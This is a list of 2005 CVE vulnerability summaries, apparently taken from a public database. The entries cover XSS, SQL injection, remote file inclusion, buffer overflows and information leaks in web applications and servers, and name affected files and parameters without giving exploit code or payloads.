[CVE-2005-1250] SQL injection vulnerability in the logon screen of the web front end (NmConsole/Login.asp) for Ipswitch WhatsUp Professional 2005 SP1 allows remote attackers to execute arbitrary SQL commands via the (1) User Name field (sUserName parameter) or (2) Password field (sPassword parameter).
[CVE-2005-1247] webadmin.exe in Novell Nsure Audit 1.0.1 allows remote attackers to cause a denial of service via malformed ASN.1 packets in corrupt client certificates to an SSL server, as demonstrated using an exploit for the OpenSSL ASN.1 parsing vulnerability.
[CVE-2005-1245] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.4.2, when using HTML Tidy ($wgUseTidy), allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-1233] Cross-site scripting (XSS) vulnerability in index.php in PHP Labs proFile allows remote attackers to inject arbitrary web script or HTML via the (1) dir or (2) file parameters.
[CVE-2005-1232] Buffer overflow in Sun Java System Web Proxy Server (aka Sun ONE Proxy Server) 3.6 SP6 allows remote attackers to execute arbitrary code via unknown vectors.
[CVE-2005-1231] Cross-site scripting (XSS) vulnerability in the NewTerm function in GlossaryModel.php in JAWS 0.4 allows remote attackers to inject arbitrary web script or HTML via the (1) term or (2) description.
[CVE-2005-1227] Cross-site scripting (XSS) vulnerability in PHProjekt 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the chatroom text submission form.
[CVE-2005-1214] Microsoft Agent allows remote attackers to spoof trusted Internet content and execute arbitrary code by disguising security prompts on a malicious Web page.
[CVE-2005-1207] Buffer overflow in the Web Client service in Microsoft Windows XP and Windows Server 2003 allows remote authenticated users to execute arbitrary code via a crafted WebDAV request containing special parameters.
[CVE-2005-1202] Multiple cross-site scripting (XSS) vulnerabilities in eGroupware before 1.0.0.007 allow remote attackers to inject arbitrary web script or HTML via the (1) ab_id, (2) page, (3) type, or (4) lang parameter to index.php or (5) category_id parameter.
[CVE-2005-1200] PHP remote file inclusion vulnerability in main_index.php in AZ Bulletin Board (AZbb) 1.0.07a through 1.0.07c allows remote attackers to execute arbitrary PHP code by modifying the (1) dir_src or (2) abs_layer parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-1191] The Web View DLL (webvw.dll), as used in Windows Explorer on Windows 2000 systems, does not properly filter an apostrophe ("'") in the author name in a document, which allows attackers to execute arbitrary script via extra attributes when Web View constructs a mailto: link for the preview pane when the user selects the file.
[CVE-2005-1190] WebcamXP PRO v2.16.468 and earlier allows remote attackers to cause a denial of service via a long chat name, which takes up too much display space and prevents the chat frame from being properly rendered.
[CVE-2005-1189] Cross-site scripting (XSS) vulnerability in WebcamXP PRO v2.16.468 and earlier allows remote attackers to inject arbitrary web script or HTML via the chat name, as demonstrated by using an IFRAME to redirect users to other sites.
[CVE-2005-1188] Cross-site scripting (XSS) vulnerability in comersus_searchItem.asp in Comersus 3.90 to 4.51 allows remote attackers to inject arbitrary web script or HTML via the curPage parameter.
[CVE-2005-1183] Cross-site scripting (XSS) vulnerability in mvnForum 1.0 RC4 allows remote attackers to inject arbitrary web script or HTML via the Search parameter.
[CVE-2005-1181] ** DISPUTED ** NOTE: this issue has been disputed by the vendor. PHP remote code injection vulnerability in loader.php for Ariadne CMS 2.4 allows remote attackers to execute arbitrary PHP code by modifying the ariadne parameter to reference a URL on a remote web server that contains the code. NOTE: the vendor has disputed this issue, saying that loader.php first requires the "ariadne.inc" file, which defines the $ariadne variable, and thus it cannot be modified by an attacker. In addition, CVE personnel have partially verified the dispute via source code inspection of Ariadne 2.4 as available on July 5, 2005.
[CVE-2005-1180] HTTP Response Splitting vulnerability in the Surveys module in PHP-Nuke 7.6 allows remote attackers to spoof web content and poison web caches via hex-encoded CRLF ("%0d%0a") sequences in the forwarder parameter.
[CVE-2005-1179] Unknown vulnerability in Xerox MicroServer Web Server for various WorkCentre products including M35/M45/M55 2.028.11.000 through 2.97.20.032 and 4.84.16.000 through 4.97.20.032, Pro 35/45/55 3.028.11.000 through 3.97.20.032, Pro 65/75/90 1.001.00.060 through 1.001.02.084, and others, related to SNMP authentication, allows remote attackers to modify system configuration, a different vulnerability than CVE-2005-0703.
[CVE-2005-1177] Unknown vulnerability in (1) Webmin and (2) Usermin before 1.200 causes Webmin to change permissions and ownership of configuration files, with unknown impact.
[CVE-2005-1173] Buffer overflow in PMSoftware Simple Web Server 1.0 allows remote attackers to execute arbitrary code via a long GET request.
[CVE-2005-1172] Cross-site scripting (XSS) vulnerability in init.inc.php in Coppermine Photo Gallery 1.3.x allows remote attackers to inject arbitrary web script or HTML via the X-Forwarded-For parameter.
[CVE-2005-1171] Cross-site scripting (XSS) vulnerability in mod.php in the datenbank module for phpBB allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2005-1162] Multiple cross-site scripting (XSS) vulnerabilities in OneWorldStore allow remote attackers to inject arbitrary web script or HTML via the (1) sEmail parameter to owContactUs.asp, (2) bSub parameter to owListProduct.asp, or the (3) Name, (4) Email, or (5) Comment fields in owProductDetail.asp.
[CVE-2005-1150] Unknown vulnerability in Sun Java System Web Server 6.0 SP7 and earlier, when running on Windows systems, allows attackers to cause a denial of service (hang).
[CVE-2005-1146] ** DISPUTED ** NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in the login command in calendar.pl in CalendarScript 3.21 allows remote attackers to inject arbitrary web script or HTML via the username parameter, a different vulnerability than CVE-2005-1145.
[CVE-2005-1145] ** DISPUTED ** NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in calendar.pl in CalendarScript 3.20 allows remote attackers to inject arbitrary web script or HTML via the template parameter, a different vulnerability than CVE-2005-1146.
[CVE-2005-1144] popup.php in EasyPHPCalendar before 6.2.8 allows remote attackers to obtain sensitive information via an invalid ev parameter, which reveals the full pathname of the web server in a PHP error message.
[CVE-2005-1143] Cross-site scripting (XSS) vulnerability in index.php in EasyPHPCalendar before 6.2.8 allows remote attackers to inject arbitrary web script or HTML via the yr parameter.
[CVE-2005-1140] Cross-site scripting (XSS) vulnerability in myBloggie 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the comments.
[CVE-2005-1138] Unknown vulnerability in WebMail in Kerio MailServer before 6.0.9 allows remote attackers to cause a denial of service (CPU consumption) via certain e-mail messages.
[CVE-2005-1136] Simple PHP Blog (sphpBlog) 0.4.0 stores the (1) password.txt and (2) config.txt files under the web document root, which allows remote attackers to obtain sensitive information and crack passwords via a direct request to these files.
[CVE-2005-1135] Cross-site scripting (XSS) vulnerability in search.php for Simple PHP Blog (sphpBlog) 0.4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2005-1130] Cross-site scripting (XSS) vulnerability in index.php in Pinnacle Cart allows remote attackers to inject arbitrary web script or HTML via the pg parameter.
[CVE-2005-1120] Multiple cross-site scripting (XSS) vulnerabilities in IlohaMail 0.8.14 and earlier allow remote attackers to inject arbitrary web script or HTML via the e-mail (1) body, (2) filename, or (3) MIME type.
[CVE-2005-1118] Cross-site scripting (XSS) vulnerability in IISWebAgentIF.dll in the RSA Authentication Agent for Web 5.2 allows remote attackers to inject arbitrary web script or HTML via the postdata parameter.
[CVE-2005-1117] PHP remote file inclusion vulnerability in index.php in All4WWW-Homepagecreator 1.0a allows remote attackers to execute arbitrary PHP code by modifying the site parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-1116] Cross-site scripting (XSS) vulnerability in the Calendar module for phpBB allows remote attackers to inject arbitrary web script or HTML via the start parameter to calendar_scheduler.php.
[CVE-2005-1115] Multiple cross-site scripting (XSS) vulnerabilities in the Photo Album 2.0.53 module for phpBB allow remote attackers to inject arbitrary web script or HTML via the bsid parameter to (1) album_cat.php or (2) album_comment.php.
[CVE-2005-1113] Multiple cross-site scripting (XSS) vulnerabilities in PhpBB Plus 1.52 and earlier allow remote attackers to inject arbitrary web script or HTML via the bsid parameter to (1) groupcp.php, (2) index.php, (3) portal.php, (4) viewforum.php, or (5) viewtopic.php, (6) the c parameter to index.php, or (7) the article parameter to portal.php.
[CVE-2005-1112] IBM WebSphere Application Server 6.0 and earlier, when sharing the document root of the web server, allows remote attackers to obtain the source code for Java Server Pages (.jsp) via an HTTP request with an invalid Host header, which causes the page to be processed by the web server instead of the JSP engine.
[CVE-2005-1104] Multiple cross-site scripting (XSS) vulnerabilities in Centra 7 allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) first name, or (3) last name fields.
[CVE-2005-1099] Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.
[CVE-2005-1095] Cross-site scripting (XSS) vulnerability in main.asp for Ocean12 Membership Manager Pro 1.x allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2005-1085] Cross-site scripting (XSS) vulnerability in the control panel in aeDating 3.2 allows remote attackers to inject arbitrary web script or HTML.
[CVE-2005-1081] Cross-site scripting (XSS) vulnerability in view.php in AzDGDatingPlatinum 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2005-1077] Multiple cross-site scripting (XSS) vulnerabilities in XAMPP 1.4.x allow remote attackers to inject arbitrary web script or HTML via (1) cds.php, (2) Guestbook-EN.pl, or (3) phonebook.php.
[CVE-2005-1076] Cross-site scripting (XSS) vulnerability in the discussion board functionality for WebCT Campus Edition 4.1 allows remote attackers to inject arbitrary web script or HTML via the message field.
[CVE-2005-1075] Multiple cross-site scripting (XSS) vulnerabilities in RadScripts RadBids Gold 2 allow remote attackers to inject arbitrary web script or HTML via (1) the farea parameter to faq.php or the (2) cat, (3) order, or (4) area parameters to index.php.
[CVE-2005-1072] Cross-site scripting (XSS) vulnerability in PunBB before 1.2.5 allows remote attackers to inject arbitrary web script or HTML.
[CVE-2005-1071] SQL injection vulnerability in banner.inc.php in JPortal Web Portal 2.3.1 allows remote attackers to execute arbitrary SQL commands via the haslo parameter.
[CVE-2005-1055] TowerBlog 0.6 and earlier stores the login data file under the web root, which allows remote attackers to obtain the MD5 checksums of the username and password via a direct request to the _dat/login file.
[CVE-2005-1054] PHP remote file inclusion vulnerability in news.php in ModernBill 4.3.0 and earlier allows remote attackers to execute arbitrary PHP code by modifying the DIR parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-1053] Multiple cross-site scripting (XSS) vulnerabilities in orderwiz.php in ModernBill 4.3.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) c_code or (2) aid parameters.
[CVE-2005-1052] Microsoft Outlook 2003 and Outlook Web Access (OWA) 2003 do not properly display comma separated addresses in the From field in an e-mail message, which could allow remote attackers to spoof e-mail addresses.
[CVE-2005-1049] Multiple cross-site scripting vulnerabilities in PostNuke 0.760-RC3 allow remote attackers to inject arbitrary web script or HTML via the (1) module parameter to admin.php or (2) op parameter to user.php. NOTE: the vendor reports that certain issues could not be reproduced for 760 RC3, or for .750. However, the op/user.php issue exists when the pnAntiCracker setting is disabled.
[CVE-2005-1030] Multiple cross-site scripting (XSS) vulnerabilities in Active Auction House allow remote attackers to inject arbitrary web script or HTML via the (1) ReturnURL, (2) password, (3) username parameter, (4) ReturnURL parameter to account.asp, (5) Table, (6) Title parameter to sendpassword.asp, or (7) itemid to watchthisitem.asp.
[CVE-2005-1027] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.x through 7.6 allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter in the Your_Account module, (2) avatarcategory parameter in the Your_Account module, or (3) lid parameter in the Downloads module.
[CVE-2005-1023] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.x to 7.6 allow remote attackers to inject arbitrary web script or HTML via the (1) min parameter to the Search module, (2) the categories parameter to the FAQ module, or (3) the ltr parameter to the Encyclopedia module. NOTE: the bid parameter issue in banners.php is already an item in CVE-2005-1000.
[CVE-2005-1022] ColdFusion 6.1 Updater 1 places Java .class files under the web root in the /WEB-INF/cfclasses directory, which allows remote attackers to obtain sensitive information.
[CVE-2005-1017] SQL injection vulnerability in the Update_Events function in events_functions.asp in MaxWebPortal 1.33 and earlier allows remote attackers to execute arbitrary SQL commands via the EVENT_ID parameter, as demonstrated using events.asp.
[CVE-2005-1016] Cross-site scripting (XSS) vulnerability in links_add_form.asp for MaxWebPortal 1.33 and earlier allows remote attackers to inject arbitrary web script or HTML via a Javascript URL in a banner URL.
[CVE-2005-1012] Cross-site scripting (XSS) vulnerability in Iatek SiteEnable allows remote attackers to inject arbitrary web script or HTML via (1) the contenttype parameter to content.asp, (2) the title, or (3) the description.
[CVE-2005-1010] Cross-site scripting (XSS) vulnerability in Comersus Cart 6 allows remote attackers to inject arbitrary web script or HTML via the account username.
[CVE-2005-1008] Cross-site scripting (XSS) vulnerability in posts.asp for ASP-DEV XM Forum RC3 allows remote attackers to inject arbitrary web script or HTML via a "javascript:" URL in an IMG tag.
[CVE-2005-1006] Multiple cross-site scripting (XSS) vulnerabilities in SonicWALL SOHO 5.1.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the URL or (2) the user login name, which is not filtered when the administrator views the log file.
[CVE-2005-1004] Cross-site scripting (XSS) vulnerability in usrdetails.php in ProfitCode PayProCart 3.0 allows remote attackers to inject arbitrary web script or HTML via the sgnuptype parameter.
[CVE-2005-1002] logwebftbs2000.exe in Logics Software File Transfer (LOG-FT) allows remote attackers to read arbitrary files via modified (1) VAR_FT_LANG and (2) VAR_FT_TMPL parameters.
[CVE-2005-1001] PHP-Nuke 7.6 allows remote attackers to obtain sensitive information via direct requests to (1) the Surveys module with the file parameter set to comments or (2) 3D-Fantasy/theme.php, which leaks the full pathname of the web server in a PHP error message.
[CVE-2005-1000] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 7.6 allow remote attackers to inject arbitrary web script or HTML via (1) the bid parameter to the EmailStats op in banners.pgp, (2) the ratenum parameter in the TopRated and MostPopular actions in the Web_Links module, (3) the ttitle parameter in the viewlinkdetails, viewlinkeditorial, viewlinkcomments, and ratelink actions in the Web_Links module, or (4) the username parameter in the Your_Account module.
[CVE-2005-0998] The Web_Links module for PHP-Nuke 7.6 allows remote attackers to obtain sensitive information via an invalid show parameter, which triggers a division by zero PHP error that leaks the full pathname of the server.
[CVE-2005-0997] Multiple SQL injection vulnerabilities in the Web_Links module for PHP-Nuke 7.6 allow remote attackers to execute arbitrary SQL commands via (1) the email or url parameters in the Add function, (2) the url parameter in the modifylinkrequestS function, (3) the orderby or min parameters in the viewlink function, (4) the orderby, min, or show parameters in the search function, or (5) the ratenum parameter in the MostPopular function.
[CVE-2005-0996] Multiple SQL injection vulnerabilities in the Downloads module for PHP-Nuke 7.6 allow remote attackers to inject arbitrary web script or HTML via (1) the email or url parameters in the Add function, (2) the min parameter in the viewsdownload function, or (3) the min parameter in the search function.
[CVE-2005-0995] Multiple cross-site scripting (XSS) vulnerabilities in ProductCart 2.7 allow remote attackers to inject arbitrary web script or HTML via (1) the keyword parameter to advSearch_h.asp, (2) the redirectUrl parameter to NewCust.asp, (3) the country parameter to storelocator_submit.asp, or (4) the error parameter to techErr.asp. NOTE: it has been reported that storelocator_submit.asp does not exist in ProductCart.
[CVE-2005-0992] Cross-site scripting (XSS) vulnerability in index.php in phpMyAdmin before 2.6.2-rc1 allows remote attackers to inject arbitrary web script or HTML via the convcharset parameter.
[CVE-2005-0986] NLSCCSTR.DLL in the web service in IBM Lotus Domino Server 6.5.1, 6.0.3, and possibly other versions allows remote attackers to cause a denial of service (deep recursion and nHTTP.exe process crash) via a long GET request containing UNICODE decimal value 430 characters, which causes the stack to be exhausted. NOTE: IBM has reported that it is unable to replicate this issue.
[CVE-2005-0982] Multiple cross-site scripting (XSS) vulnerabilities in Yet Another Forum.net 0.9.9 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) location, or (3) Subject field.
[CVE-2005-0981] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft EPay Pro 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) payment or (2) send parameter.
[CVE-2005-0980] PHP remote file inclusion vulnerability in index.php in AlstraSoft EPay Pro 2.0 allows remote attackers to execute arbitrary PHP code by modifying the view parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-0976] AppleWebKit (WebCore and WebKit), as used in multiple products such as Safari 1.2 and OmniGroup OmniWeb 5.1, allows remote attackers to read arbitrary files via the XMLHttpRequest Javascript component, as demonstrated using automatically mounted disk images and file:// URLs.
[CVE-2005-0961] Cross-site scripting (XSS) vulnerability in Horde 3.0.4 before 3.0.4-RC2 allows remote attackers to inject arbitrary web script or HTML via the parent frame title.
[CVE-2005-0952] Cross-site scripting vulnerability in pafiledb.php in PaFileDB 3.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2005-0949] Multiple cross-site scripting (XSS) vulnerabilities in content.asp in Iatek PortalApp allow remote attackers to inject arbitrary web script or HTML via the (1) contenttype or (2) keywords parameter.
[CVE-2005-0945] Cross-site scripting (XSS) vulnerability in ACS Blog 1.1.1 allows remote attackers to inject arbitrary web script or HTML via onmouseover or onload events in (1) img, (2) link, or (3) mail tags.
[CVE-2005-0938] Ublog Reload 1.0 through 1.0.4 stores ublogreload.mdb under the web root, which allows remote attackers to read usernames and hashed passwords via a direct request to ublogreload.mdb.
[CVE-2005-0936] Cross-site scripting vulnerability in products1h.php in ESMI PayPal Storefront allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2005-0934] Multiple cross-site scripting (XSS) vulnerabilities in WackoWiki R4 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-0930] Cross-site scripting (XSS) vulnerability in message.php in Chatness 2.5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) the user field or (2) the message parameter to message.php.
[CVE-2005-0928] Multiple cross-site scripting (XSS) vulnerabilities in PhotoPost PHP Pro 5.x allow remote attackers to inject arbitrary web script or HTML via the (1) cat, (2) password, (3) ppuser, (4) sort, or (5) si parameters to showgallery.php, the (6) ppuser, (7) sort, or (8) si parameters to showmembers.php, or (9) the photo parameter to slideshow.php.
[CVE-2005-0927] Unknown vulnerability in subs.pl for WebAPP 0.9.9 through 0.9.9.2 has unknown impact and attack vectors, probably involving shell metacharacters or .. sequences.
[CVE-2005-0925] Cross-site scripting (XSS) vulnerability in login.asp for Ublog Reload 1.0 through 1.0.4 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2005-0924] Cross-site scripting (XSS) vulnerability in Adventia E-Data 2.0 allows remote attackers to inject arbitrary web script or HTML via a query keyword.
[CVE-2005-0919] Adventia Chat 3.1 and Server Pro 3.0 allows remote attackers to inject arbitrary web script or HTML into the chat space, which leaves other users vulnerable to cross-site scripting (XSS) attacks.
[CVE-2005-0918] The NPSVG3.dll ActiveX control for Adobe SVG Viewer 3.02 and earlier, when running on Internet Explorer, allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not.
[CVE-2005-0915] Webmasters-Debutants WD Guestbook 2.8 allows remote attackers to bypass authentication and perform certain administrator actions via a direct HTTP POST request to (1) ajout_admin2.php or (2) suppr.php.
[CVE-2005-0914] Multiple cross-site scripting (XSS) vulnerabilities in CPG Dragonfly 9.0.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) the profile parameter to index.php or (2) the cat parameter.
[CVE-2005-0910] Multiple cross-site scripting (XSS) vulnerabilities in exoops allow remote attackers to inject arbitrary web script or HTML via (1) the sortdays parameter to viewforum.php or (2) the viewcat parameter to index.php.
[CVE-2005-0908] Multiple cross-site scripting (XSS) vulnerabilities in Valdersoft Shopping Cart 3.0 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter to index.php or (2) the searchTopCategoryID parameter to search_result.php.
[CVE-2005-0905] Maxthon 1.2.0 allows remote malicious web sites to obtain potentially sensitive data from the search bar via the m2_search_text property.
[CVE-2005-0901] Multiple cross-site scripting (XSS) vulnerabilities in NukeBookmarks 0.6 for PHP-Nuke allow remote attackers to inject arbitrary web script or HTML via the (1) catname, (2) markname, (3) comment, or (4) category parameter.
[CVE-2005-0898] Cross-site scripting (XSS) vulnerability in downloadform.php in E-Store Kit-2 PayPal Edition allows remote attackers to inject arbitrary web script or HTML via the txn_id parameter.
[CVE-2005-0897] PHP remote file inclusion vulnerability in catalog.php in E-Store Kit-2 PayPal Edition allows remote attackers to execute arbitrary PHP code by modifying the menu and main parameters to reference a URL on a remote web server that contains the code.
[CVE-2005-0896] Multiple cross-site scripting (XSS) vulnerabilities in review.php in phpMyDirectory 10.1.3-rel allow remote attackers to inject arbitrary web script or HTML via the (1) subcat, (2) page, or (3) subsubcat parameter.
[CVE-2005-0889] Cross-site scripting (XSS) vulnerability in index.php for Dream4 Koobi CMS 4.2.3 allows remote attackers to inject arbitrary web script or HTML via the area parameter.
[CVE-2005-0888] Multiple cross-site scripting (XSS) vulnerabilities in functions.inc.php for Double Choco Latte 0.9.4.3 allow remote attackers to inject arbitrary web script or HTML via the (1) class or (2) method name.
[CVE-2005-0886] Cross-site scripting (XSS) vulnerability in Invision Power Board 2.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via an HTTP POST request.
[CVE-2005-0885] Multiple cross-site scripting (XSS) vulnerabilities in XMB Forum 1.9.1 allow remote attackers to inject arbitrary web script or HTML via the (1) Mood or (2) "Send To" fields.
[CVE-2005-0883] Multiple cross-site scripting (XSS) vulnerabilities in base.php for DigitalHive 2.0 allow remote attackers to inject arbitrary web script or HTML via (1) the mt parameter to the membres.php page or (2) the -afs-1- query string to the msg.php page.
[CVE-2005-0881] Cross-site scripting (XSS) vulnerability in articles.newcomment for Interspire ArticleLive 2005 allows remote attackers to inject arbitrary web script or HTML via the Articleld parameter.
[CVE-2005-0878] Cross-site scripting (XSS) vulnerability in MercuryBoard before 1.1.3 allows remote attackers to inject arbitrary web script or HTML via the title field of a PM (private message).
[CVE-2005-0875] Multiple buffer overflows in the Yahoo plug-in for Trillian 2.0, 3.0, and 3.1 allow remote web servers to cause a denial of service (application crash) via a long string in an HTTP 1.1 response header.
[CVE-2005-0874] Multiple buffer overflows in the (1) AIM, (2) MSN, (3) RSS, and other plug-ins for Trillian 2.0 allow remote web servers to cause a denial of service (application crash) via a long string in an HTTP 1.1 response header.
[CVE-2005-0873] Multiple cross-site scripting (XSS) vulnerabilities in test.jsp in Oracle Reports Server 10g (9.0.4.3.3) allow remote attackers to inject arbitrary web script or HTML via the (1) desname or (2) repprod parameter.
[CVE-2005-0872] Cross-site scripting (XSS) vulnerability in calendar_scheduler.php in the Topic Calendar 1.0.1 module for phpBB allows remote attackers to inject arbitrary web script or HTML via the start parameter.
[CVE-2005-0870] Multiple cross-site scripting (XSS) vulnerabilities in phpSysInfo 2.3, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) sensor_program parameter to index.php, (2) text[language], (3) text[template], or (4) hide_picklist parameter to system_footer.php.
[CVE-2005-0864] The Boa web server, as used in Samsung ADSL Modem SMDK8947v1.2 and possibly other products, allows remote attackers to read arbitrary files via a full pathname in the HTTP request.
[CVE-2005-0863] Cross-site scripting (XSS) vulnerability in PHPOpenChat v3.x allows remote attackers to inject arbitrary web script or HTML via (1) the chatter parameter to regulars.php or (2) the chatter, chatter1, chatter2, chatter3, or chatter4 parameters to register.php.
[CVE-2005-0857] Cross-site scripting (XSS) vulnerability in avatar.php for CoolForum 0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the img parameter.
[CVE-2005-0853] betaparticle blog (bp blog) stores the database under the web root, which allows remote attackers to obtain sensitive information via a direct request to (1) dbBlogMX.mdb for versions before 3.0, or (2) Blog.mdb for versions 3.0 and later. NOTE: it was later reported that vector 2 also affects versions 6.0 through 9.0.
[CVE-2005-0846] Multiple cross-site scripting (XSS) vulnerabilities in the email auto-reply message in SurgeMail 2.2g3 allow remote attackers to inject arbitrary web script or HTML via the (1) message subject or (2) message header field.
[CVE-2005-0842] Cross-site scripting (XSS) vulnerability in index.php in Kayako eSupport 2.3 allows remote attackers to inject arbitrary web script or HTML via the (1) _i or (2) _c parameter.
[CVE-2005-0836] Argument injection vulnerability in Java Web Start for J2SE 1.4.2 up to 1.4.2_06 allows untrusted applications to gain privileges via the value parameter of a property tag in a JNLP file.
[CVE-2005-0832] Cross-site scripting (XSS) vulnerability in PHP-Post before 0.33 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-0829] Cross-site scripting (XSS) vulnerability in setuser.php of the Digitanium addon to PHP-Fusion 5.01 allows remote attackers to inject arbitrary web script or HTML via the (1) user_name or (2) user_pass parameters.
[CVE-2005-0820] Microsoft Office InfoPath 2003 SP1 includes sensitive information in the Manifest.xsf file in a custom .xsn form, which allows attackers to obtain printer and network information, obtain the database name, username, and password, or obtain the internal web server name.
[CVE-2005-0818] Cross-site scripting (XSS) vulnerability in PunBB 1.2.3 allows remote attackers to inject arbitrary web script or HTML via the (1) email or (2) Jabber parameters.
[CVE-2005-0802] Cross-site scripting (XSS) vulnerability in search.asp in ACS Blog 0.8 through 1.1b allows remote attackers to execute arbitrary web script or HTML via the search parameter.
[CVE-2005-0800] PHP remote file inclusion vulnerability in install.php in mcNews 1.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the l parameter to reference a URL on a remote web server that contains the code, a different vulnerability than CVE-2005-0720.
[CVE-2005-0791] Cross-site scripting (XSS) vulnerability in adframe.php in phpAdsNew 2.0.4-pr1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the refresh parameter.
[CVE-2005-0785] Cross-site scripting (XSS) vulnerability in usersrecentposts in YaBB 2.0 rc1 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2005-0784] Multiple cross-site scripting (XSS) vulnerabilities in Phorum before 5.0.15 allow remote attackers to inject arbitrary web script or HTML via (1) the subject line to follow.php or (2) the subject line in the user's personal control panel.
[CVE-2005-0783] Cross-site scripting (XSS) vulnerability in Phorum before 5.0.14a allows remote attackers to inject arbitrary web script or HTML via the filename of an attached file.
[CVE-2005-0782] Cross-site scripting (XSS) vulnerability in (1) viewall.php and (2) category.php for paFileDB 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the start parameter to pafiledb.php.
[CVE-2005-0777] Multiple cross-site scripting (XSS) vulnerabilities in PhotoPost PHP 5.0 RC3 allow remote attackers to inject arbitrary web script or HTML via (1) the check_tags function or (2) the editbio field in the user profile.
[CVE-2005-0771] VERITAS Backup Exec Server (beserver.exe) 9.0 through 10.0 for Windows allows remote unauthenticated attackers to modify the registry by calling methods to the RPC interface on TCP port 6106.
[CVE-2005-0768] Buffer overflow in the administration web server for GoodTech Telnet Server 4.0 and 5.0, and possibly all versions before 5.0.7, allows remote attackers to execute arbitrary code via a long string to port 2380.
[CVE-2005-0748] PHP remote file inclusion vulnerability in initdb.php for WEBInsta Mailing list manager 1.3d allows remote attackers to execute arbitrary PHP code by modifying the absolute_path parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-0744] The web GUI for Novell iChain 2.2 and 2.3 SP2 and SP3 allows attackers to hijack sessions and gain administrator privileges by (1) sniffing the connection on TCP port 51100 and replaying the authentication information or (2) obtaining and replaying the PCZQX02 authentication cookie from the browser.
[CVE-2005-0742] Cross-site scripting (XSS) vulnerability in Sun Java System Application Server 7 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-0741] Cross-site scripting (XSS) vulnerability in YaBB.pl for YaBB 2.0 RC1 allows remote attackers to inject arbitrary web script or HTML via the username parameter in a usersrecentposts action.
[CVE-2005-0734] PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to cause a denial of service (memory exhaustion and process crash) via a large number of HTTP requests.
[CVE-2005-0733] PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to determine the existence of files via an HTTP request with a full pathname, which produces different messages whether the file exists or not.
[CVE-2005-0732] PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to obtain the full path of the web server via a request for a non-existent filename, which leaks the full path in an error message.
[CVE-2005-0731] PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to cause a denial of service (CPU consumption) via a direct request to Filelist.html.
[CVE-2005-0730] PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to cause a denial of service via a request to a file on the floppy drive, as demonstrated using A:\a.txt.
[CVE-2005-0723] Cross-site scripting (XSS) vulnerability in the jumpmenu function in functions.php for paFileDB 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the URL parameters, which is not properly cleansed in the $pageurl variable, as demonstrated using pafiledb.php.
[CVE-2005-0722] eXPerience2 allows remote attackers to obtain the full path for the web root via a direct request to modules.php without any parameters, which leaks the path in a PHP error message.
[CVE-2005-0721] PHP remote file inclusion vulnerability in modules.php in eXPerience2 allows remote attackers to execute arbitrary PHP code by modifying the file parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-0720] PHP remote file inclusion vulnerability in admin/header.php in PHP mcNews 1.3 allows remote attackers to execute arbitrary PHP code by modifying the skinfile parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-0703] Xerox MicroServer Web Server for various WorkCentre products including M35/M45/M55 2.028.11.000 through 2.97.20.032 and 4.84.16.000 through 4.97.20.032, Pro 35/45/55 3.028.11.000 through 3.97.20.032, Pro 65/75/90 1.001.00.060 through 1.001.02.084, and others, has an "unauthenticated account," which allows remote attackers to modify system configuration, a different vulnerability than CVE-2005-1179.
[CVE-2005-0698] PHP remote file inclusion vulnerability in PHPWebLog 0.5.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the (1) G_PATH parameter to init.inc.php or the (2) PATH parameter to index.php to reference a URL on a remote web server that contains the code.
